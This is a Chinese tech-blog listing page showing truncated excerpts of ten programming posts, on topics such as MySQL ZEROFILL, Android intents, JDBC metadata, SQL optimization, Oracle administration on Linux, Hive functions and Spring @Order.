  • 细节问题:ZEROFILL的用法范围。 dcj3sjt126com mysql
    1、zerofill把月份中的一位数字比如1,2,3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
  • Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。   一、Activity跳转 方法一Intent intent = new Intent(A.this, B.class); startActivity(intent)   方法二Intent intent = new Intent();intent.setCla
  • jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
  • Android 应用程序开关GPS gqdy365 android
    要在应用程序中操作GPS开关需要权限: <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 1、方法一:将项目放到Android源码中编译; 2、方法二:网上有人说cl
  • Windows上调试MapReduce zhiquanliu mapreduce
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
  • 如何看待一些知名博客推广软文的行为? justjavac 博客
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态: 当初求种像条狗,如今撸完嫌人丑 当初搜贴像条犬,如今读完嫌人软 你为啥感觉不舒服呢? 难道非得要作者把自己的劳动成果免费给你用,你才舒服? 就如同 Google 关闭了 Gooled Reader,那是
  • sql优化总结 macroli sql
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢!   要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。   一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
  • Linux Oracle中常遇到的一些问题及命令总结 超声波 oraclelinux
    1.linux更改主机名   (1)#hostname oracledb    临时修改主机名 (2) vi /etc/sysconfig/network   修改hostname (3) vi /etc/hosts        修改IP对应的主机名   2.linux重启oracle实例及监听的各种方法 (注意操作的顺序应该是先监听,后数据库实例) &nbs
  • hive函数大全及使用示例 superlxw1234 hadoophive函数
      具体说明及示例参 见附件文档。     文档目录:   目录 一、关系运算: 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
  • Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
    4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示 两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他